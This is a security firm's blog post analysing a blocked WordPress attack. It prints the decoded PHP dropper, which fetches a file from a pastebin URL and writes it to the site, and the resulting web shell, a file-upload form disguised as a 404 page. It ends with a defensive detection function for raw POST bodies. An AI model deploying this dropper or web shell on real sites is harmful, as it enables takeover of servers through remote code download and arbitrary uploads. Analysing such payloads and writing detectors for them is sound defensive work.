2 Dec 2021

Hackers Won’t be Blocked From Trying to Upload This to Your WordPress Website by Other Firewall Plugins

Two months ago we did testing that showed that WordPress security plugins didn’t protect against exploitation of vulnerabilities that involve sending user input containing PHP code as raw POST data, which the vulnerable code then reads from php://input. At the time, we improved our new Plugin Vulnerabilities Firewall to address that type of exploit. Based on the results of our automated testing, none of the other firewall plugins for WordPress have followed our lead and added protection against this in the two months since.

Today our firewall stopped multiple attempts to exploit this type of issue on our website. These attempts would have failed anyway, since they targeted software not on our website, but the attempts and the firewall’s logging gave us a chance to see what the hacker was trying to do.

Here is the PHP code that was sent with the requests:

<?php eval('?>'.base64_decode('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')); ?>

Most of that is obfuscated using base64 encoding, which can easily be decoded. Here is what was obfuscated:

<?php
function adminer($url, $isi) {
	$fp = fopen($isi, "w");
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $url);
	curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
	curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
	curl_setopt($ch, CURLOPT_FILE, $fp);
	return curl_exec($ch);
	curl_close($ch);
	fclose($fp);
	ob_flush();
	flush();
}
if(adminer("https://pastebin.com/raw/KNPSqTuP","mnd404.php")) {
	echo "Sukses";
} else {
	echo "fail";
}
?>

That will get the contents of the file located at https://pastebin.com/raw/KNPSqTuP and save it to a file on the website named mnd404.php.

The file being added would contain the following code:

<?php if(isset($_GET["mndxdz"])){echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>Berhasil Cok</b>-->".$_FILES["f"]["name"];}else{echo"<b>Gagal Cok";}}}?><title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache This Server Port 80</address>
</body></html>

That file contains code that displays “information about the operating system PHP is running on”, the output of the PHP function php_uname(), when a particular query parameter is present. The other code in it would permit uploading additional files to the website.

That file has been on pastebin.com since July 2020. Another variant of the same file has been on there since November 2017.
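As an added example that is not the Plugin Vulnerabilities Firewall's own code, here is the kind of check a WordPress firewall plugin could run on the raw POST body before any other code reads php://input; the function and constant names are this example's own, and the sample request bodies are constructed.

```php
<?php
// Markers of an inline PHP payload, kept narrow so ordinary form posts and
// JSON bodies are not flagged.
const PHP_PAYLOAD_PATTERNS = [
    '/<\?php\b/i',                                   // PHP open tag
    '/<\?=/',                                        // short echo tag
    '/\beval\s*\(/i',                                // eval() of runtime-built code
    '/\b(?:shell_exec|passthru|system|exec)\s*\(/i', // direct command execution
];
// True if $body looks like PHP code. Arguments of base64_decode('...') are
// decoded and checked too, up to $depth layers, so the inner stage hidden in
// eval('?>'.base64_decode('...')) is inspected, not just the outer wrapper.
function body_contains_php_payload(string $body, int $depth = 3): bool
{
    foreach (PHP_PAYLOAD_PATTERNS as $re) {
        if (preg_match($re, $body) === 1) {
            return true;
        }
    }
    $b64 = '/base64_decode\s*\(\s*[\'"]([A-Za-z0-9+\/=\s]+)[\'"]/i';
    if ($depth > 0 && preg_match_all($b64, $body, $m) > 0) {
        foreach ($m[1] as $blob) {
            $decoded = base64_decode(preg_replace('/\s+/', '', $blob), true);
            if ($decoded !== false && body_contains_php_payload($decoded, $depth - 1)) {
                return true;
            }
        }
    }
    return false;
}
// Run from the firewall plugin's bootstrap before anything else handles the
// request. Since PHP 5.6 php://input can be read more than once, so a later
// reader in another plugin is not starved.
function firewall_check_raw_post(): void
{
    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST') {
        return;
    }
    if (body_contains_php_payload((string) file_get_contents('php://input'))) {
        error_log('firewall: blocked raw POST body containing PHP code');
        http_response_code(403);
        exit;
    }
}
// Constructed samples (a short stand-in inner stage, not the real blob).
$inner   = base64_encode('<?php phpinfo(); ?>');
$wrapped = "<?php eval('?>'.base64_decode('$inner')); ?>";       // wrapper seen in the attack
var_dump(body_contains_php_payload($wrapped),
         body_contains_php_payload("x=base64_decode('$inner')"), // inner stage only
         body_contains_php_payload('a=1&b=hello'));               // ordinary form post
```

The check is deliberately independent of which plugin is vulnerable: it looks only at the request body, which is why it catches an attempt against software that is not even installed, as happened here.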
